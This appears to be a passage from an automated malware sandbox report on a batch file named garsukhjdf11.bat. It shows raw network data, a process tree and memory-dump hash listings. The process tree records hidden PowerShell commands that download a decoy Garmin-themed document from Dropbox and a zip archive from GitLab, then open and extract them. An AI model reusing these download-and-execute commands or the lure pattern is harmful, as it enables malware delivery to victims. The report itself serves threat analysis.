                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: 39 bb 0e aa bb 6d 1c 95 0d 08 76 d8 8d 97 49 87 f9 07 cb 3b be c3 85 12 26 78 38 94 8c ae 8c d3 bf 57 14 ba 37 c6 38 cf 5e e6 17 72 44 15 0d 6b 97 99 63 7e 7b a3 8a 2b b9 5b c8 39 2f 78 27 3e 7f 23 ce e7 76 f7 d7 c3 05 68 45 e1 5e 05 56 06 db 8f 40 2a 4e 0b 57 5c 66 f7 f4 a5 bc 8a 53 b9 46 c3 82 3e 40 69 10 a3 80 e7 1b 44 0e 0c fd d1 e4 14 d1 af 63 e7 8a 51 8d 1c 47 63 7a 86 86 c3 d2 30 40 de 67 c4 b2 e3 19 a8 7c 02 8c 6e 13 e2 71 c6 21 17 e0 85 1b 31 de 12 60 93 43 f0 01 29 2a 94 f3 57 e6 18 7f 2a 94 73 85 90 03 cc e2 c4 8b a9 58 ce 8b ee 53 50 4e 05 ca 79 12 cb 79 99 6b b3 c5 e9 55 a2 1d 8a 1b a7 88 37 b9 a7 bf d1 07 8b 3b 36 a4 b8 43 7a 29 2e b2 fe 77 1c 20 05 be 0c 55 8d d6 28 a4 c4 fd ba 4a 9c d0 5b 89 59 61 e9 5d 87 4e e8 1e 35 0d 25 9f e8 1f 88 e8
                                                                                                                                                                                                                Data Ascii: 9mvI;&x8W78^rDkc~{+[9/x'>#vhE^V@*NW\fSF>@iDcQGcz0@g|nq!1`C)*W*sXSPNyykU7;6Cz).w U(J[Ya]N5%
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: 86 21 fa 3f c7 97 bb c9 90 3b e9 4a 16 52 87 f5 05 47 d1 25 0f b9 87 b0 11 f1 03 55 9c fc e1 72 44 ad eb 22 e4 30 62 70 2d 82 b8 17 71 e7 15 0a 36 1b a7 de 2d 78 06 78 70 19 3b 03 8c c2 2d 8f 64 f9 1d b4 9b eb 56 0f 02 97 7c f7 b4 75 d3 5d 3c e5 0e 64 7e 19 d9 b0 0b c3 4b 36 7e c0 55 1a c1 6b 5b ab f6 ab 7b d9 98 bf ea 5e 46 7a e0 40 74 67 38 b6 d5 ab 66 5c 6c 4e 4a 35 50 1c da 94 fd e4 d3 d1 5d 9b ac 2f 00 e1 e5 5f 2d 78 ae c1 dd 2b 8d e0 19 2e d5 00 e6 a1 fb 02 c7 70 fb e2 43 72 14 24 23 1a 9e 83 57 1e 94 7c 9c 72 59 aa 5d 6a ba 3b 2a 6f fa 02 cf 20 c3 70 23 bf bf fc 68 74 f0 b0 e1 d7 d1 38 21 fd 83 d3 a5 7d 78 4d 0a a2 3a e9 b1 c1 00 92 95 d3 33 96 96 30 f2 46 72 b0 69 24 3b 27 21 cc 4d 3e a5 12 af be 4d c2 f6 c9 ed c9 47 9d 52 03 36 6d 1f e4 6d 22 10
                                                                                                                                                                                                                Data Ascii: !?;JRG%UrD"0bp-q6-xxp;-dV|u]<d~K6~Uk[{^Fz@tg8f\lNJ5P]/_-x+.pCr$#W|rY]j;*o p#ht8!}xM:30Fri$;'!M>MGR6mm"
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: ba d7 90 0c 96 ac a6 e4 33 f6 e4 33 e9 89 75 5b 4d a2 39 f9 68 ea c0 d5 d7 09 de 39 7a c9 0a 75 ab 2a 0e 97 54 00 56 47 2b 7b 04 77 b5 c1 3c b0 24 ce ff a5 b4 07 1a 43 72 d6 19 60 5d 0a 93 0a ea a2 fd 1a 9b e4 c3 76 13 a4 4f cc 37 94 2c 14 94 1a a1 fa 94 56 d0 7c 2a a5 fd 00 2d 54 9c 4a 5b ad 64 32 f0 76 a2 ce 66 4e 14 27 a3 c1 7c ef 25 31 c1 6d e6 5c 83 70 2c ae f5 de a2 fa a7 ca 8a 17 9e 6d d0 b2 e9 9a 3a ab d2 14 28 7a f1 bf 76 a8 b8 a0 28 09 ca 91 dc 0b b0 24 54 8e a4 fb de 48 1c 12 5b a6 d0 be 4f 92 ae bb 6f 98 8a dc de 97 7c 76 ef 46 7a 9f eb 04 70 4d 76 e9 90 5d 3a 66 27 77 5a 6f 0c 5e 62 35 8b 6d fc 76 0d 6d 7b 77 47 b6 98 e4 ee 28 46 e9 8a 35 b0 fe 18 b5 c1 45 f0 d0 37 a4 35 71 ef fd 5d 95 06 a6 52 8c 55 ea b4 46 b5 fa f5 ef 46 e0 91 c6 21 35 a6
                                                                                                                                                                                                                Data Ascii: 33u[M9h9zu*TVG+{w<$Cr`]vO7,V|*-TJ[d2vfN'|%1m\p,m:(zv($TH[Oo|vFzpMv]:f'wZo^b5mvm{wG(F5E75q]RUFF!5


                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                Start time:06:59:07
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" "
                                                                                                                                                                                                                Imagebase:0x7ff665390000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                Start time:06:59:07
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                Start time:06:59:07
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:chcp.com 437
                                                                                                                                                                                                                Imagebase:0x7ff6c85f0000
                                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                Start time:06:59:07
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:find
                                                                                                                                                                                                                Imagebase:0x7ff682cd0000
                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                Start time:06:59:07
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I set "C:\Users\user\Desktop\garsukhjdf11.bat"
                                                                                                                                                                                                                Imagebase:0x7ff700b70000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                Start time:06:59:07
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I goto "C:\Users\user\Desktop\garsukhjdf11.bat"
                                                                                                                                                                                                                Imagebase:0x7ff700b70000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                Start time:06:59:08
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I echo "C:\Users\user\Desktop\garsukhjdf11.bat"
                                                                                                                                                                                                                Imagebase:0x7ff700b70000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                Start time:06:59:08
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I pause "C:\Users\user\Desktop\garsukhjdf11.bat"
                                                                                                                                                                                                                Imagebase:0x7ff700b70000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                Start time:06:59:08
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:find
                                                                                                                                                                                                                Imagebase:0x7ff682cd0000
                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                Start time:06:59:08
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                Imagebase:0x7ff665390000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                Start time:06:59:08
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                Imagebase:0x7ff665390000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                Start time:06:59:08
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
                                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                Start time:06:59:16
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"
                                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                Start time:06:59:17
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                Start time:07:01:10
                                                                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Reset < >
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2171656517.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: .@_H
                                                                                                                                                                                                                  • API String ID: 0-1410794216
                                                                                                                                                                                                                  • Opcode ID: 298c09416b3cb894a548b5a7564cffe3807beef081475361d937cdf2e0085c7d
                                                                                                                                                                                                                  • Instruction ID: 8852384a1f97f1034136c43b038b0b819da058903d112cf6bd39acbc1a91dbed
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 298c09416b3cb894a548b5a7564cffe3807beef081475361d937cdf2e0085c7d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC320221D0EBCA5FEBA6AB3868155B57BF1EF56298F0801FBD04DC71D3EA189805C352
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2171656517.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 5e7e8e8ddc3d8ab4ec4298d0ea3ebef9f65477340db961b2106f17b4d15e1617
                                                                                                                                                                                                                  • Instruction ID: 7c7e9552f986c26f46bce8301d646b769ae9a3a53de97ee73feef4921cc82c5f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7e8e8ddc3d8ab4ec4298d0ea3ebef9f65477340db961b2106f17b4d15e1617
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2D12431D1EACA5FEBAAAF6868155B5BBE0FF16790F0801FAD04DC7193EA18D844C351
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2171656517.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: a6043ca61cebbbc9bdfb11f05c64a60f73da5b8f34fef7bca94051449cec2695
                                                                                                                                                                                                                  • Instruction ID: a97892317870a6e54e89947db0f5df9961e7ab91c0a40dad5bbf2e9ba02b76fa
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6043ca61cebbbc9bdfb11f05c64a60f73da5b8f34fef7bca94051449cec2695
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF31C531E1EAC74FFBB9AA28285517872E2EF42299B4401FED40DC71D3EE1CE844C211
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2171043525.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 1acd79f81e2d7c3d4bed669cd4e4c6cb76b46a28d82ed1ad8d1153b31cd12ff2
                                                                                                                                                                                                                  • Instruction ID: 6e9ea702e2b2b9e0e647e2dd016724a19502902dbb2eda46ad15dd746c4eb24e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1acd79f81e2d7c3d4bed669cd4e4c6cb76b46a28d82ed1ad8d1153b31cd12ff2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01677111CB0C4FD744EF4CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3306195615.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: a2ab710c45bb53ae8d4585c97cd3b04b1c87900f04e5703a5ac6580cf8b66a33
                                                                                                                                                                                                                  • Instruction ID: b9b1b85832b7d2b1918e93affcaf281738dc841f8b78874730010bbbd0c17993
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2ab710c45bb53ae8d4585c97cd3b04b1c87900f04e5703a5ac6580cf8b66a33
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2512731E1EA4A4FFBA9B72C585217573E1FF816A4F4801BED849C35D3EE1CA801874A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3306195615.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 2d5e6703fa8273467c98c5490ccd5a181bc1fee4c2a0c18466ae9e2f0d0d05ab
                                                                                                                                                                                                                  • Instruction ID: 8c2d80d6e76266f9baedd27bdeb147c0c0a3fb8ed373ac0dc3799b62434c904e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d5e6703fa8273467c98c5490ccd5a181bc1fee4c2a0c18466ae9e2f0d0d05ab
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F831C531E1EA8B4FF7A9B728185517872D1FF812A5F4801BAD80DC75D3DE1DA8448619
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3305704243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                  • Instruction ID: 308a13a6fba86a6f1c4292eb673f4b1c4d60328ad5f366e23d5bb4a34e106659
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3701677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3305704243.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4O_^
                                                                                                                                                                                                                  • API String ID: 0-2486912895
                                                                                                                                                                                                                  • Opcode ID: 32224f5696660612dc1e074af46c9d11ec0c240616dfc8e4f9f2fdb242aad1e1
                                                                                                                                                                                                                  • Instruction ID: 180e7f4e6a71a122a6ae61031b5b4fcb5492110d664c7a52f1c29a0107493974
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32224f5696660612dc1e074af46c9d11ec0c240616dfc8e4f9f2fdb242aad1e1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0D13363D1E7D69EE753772928660E56F60EF93798F1910F7C4888F0D39E082C4A8366
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: fQ_L
                                                                                                                                                                                                                  • API String ID: 0-272531300
                                                                                                                                                                                                                  • Opcode ID: 2c059b29b8d1d1ba271fb05d4f5b0fb0d767e71032d108ceb16e0e463622e710
                                                                                                                                                                                                                  • Instruction ID: 0d19ca33062c871c65b4b9c373b55fe8dd3ae6adc3e5ee5bb3d1899e23d5185d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c059b29b8d1d1ba271fb05d4f5b0fb0d767e71032d108ceb16e0e463622e710
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA22FA3460894D8FDB98EF1CC898AA977E1FF68305F1501AAE85ED72A5DB35EC41CB40
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                  • Opcode ID: 30506fbd5b4d8345604fd64ab2dceaf50d03ee5b2e77065dae2cf9985582b595
                                                                                                                                                                                                                  • Instruction ID: c3b3a0ba4ff748f2ea4d47082e910fd2637d601bab1b32e6fb65b645f16e07cf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30506fbd5b4d8345604fd64ab2dceaf50d03ee5b2e77065dae2cf9985582b595
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4917C31A0DA4D4FE765FB2CA8156B67BD1EF99360F1501BBE04DC32A7CA19EC428385
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: c:
                                                                                                                                                                                                                  • API String ID: 0-1827501386
                                                                                                                                                                                                                  • Opcode ID: afce05792699989769e628ad949c66f8d821c98029190ef020cce53802fff727
                                                                                                                                                                                                                  • Instruction ID: fc9ea3c3ee5768ecfc1fcc342b7dae66421c32defffcaefe836a75ab5ef8ac2f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afce05792699989769e628ad949c66f8d821c98029190ef020cce53802fff727
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82418C30B1C90A4FEA94F76C9444AB977D1EFA8390F64057AD04EC32D6EE2DEC819748
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
